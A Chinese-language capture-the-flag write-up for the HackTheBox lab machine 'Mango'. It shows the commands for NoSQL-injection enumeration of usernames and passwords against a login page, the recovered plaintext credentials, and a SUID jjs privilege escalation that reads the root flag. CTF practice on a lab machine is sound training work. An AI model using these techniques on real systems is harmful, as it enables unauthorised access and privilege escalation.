基本信息

lab地址：

https://www.hackthebox.eu/home/machines/profile/214

10.10.10.162

端口扫描

80

绑定hosts访问后是这个：

443

证书信息是staging-order.mango.htb，可以加到hosts里

Nosql injection

80登录界面其实是nosql，可以用这个

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

1	python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login -m POST

得到两个用户名：

同样的方法注入出password：

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login -m POST

2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2

user flag

对应关系是：

1 2	mango:h3mXK8RhU~f{]f5H admin:t9KcS3>!0B#2

admin不能直接SSH登录，可以使用mango:h3mXK8RhU~f{]f5H可以登录SSH, user.txt在admin用户目录中：

使用admin账号密码切换到admin，得到user.txt:

提权信息

使用LinEnum收集信息，发现可能利用的JJS

root flag

JJS具有SUID，直接使用JJS执行代码，读取root.txt:

https://gtfobins.github.io/gtfobins/jjs/

admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }
8a8ef79a7a2fbb01ea81688424e9ab15
jjs>

参考资料

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
https://github.com/rebootuser/LinEnum
Hack the box - Mango
https://mp.weixin.qq.com/s/D2VxeXN2QEW-XXAqe6qGqw
Hackthebox Mango - YouTube
https://www.youtube.com/watch?v=BbcVNgQXzDg

Mango - HackTheBox

2020-04-17